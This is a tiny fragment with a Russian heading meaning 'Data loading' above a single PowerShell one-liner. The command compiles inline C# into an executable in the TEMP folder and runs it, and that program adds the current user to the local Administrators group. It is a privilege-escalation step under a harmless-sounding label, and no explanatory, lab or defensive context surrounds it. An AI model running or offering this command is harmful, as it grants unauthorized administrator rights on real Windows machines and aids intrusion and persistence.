Загрузка данных


powershell -Command "Add-Type -TypeDefinition 'using System;using System.Diagnostics;public class P{public static void Main(){Process.Start(\"cmd.exe\",\"/c net localgroup Administrators %USERNAME% /add\");}}' -OutputAssembly $env:TEMP\p.exe; Start-Process $env:TEMP\p.exe"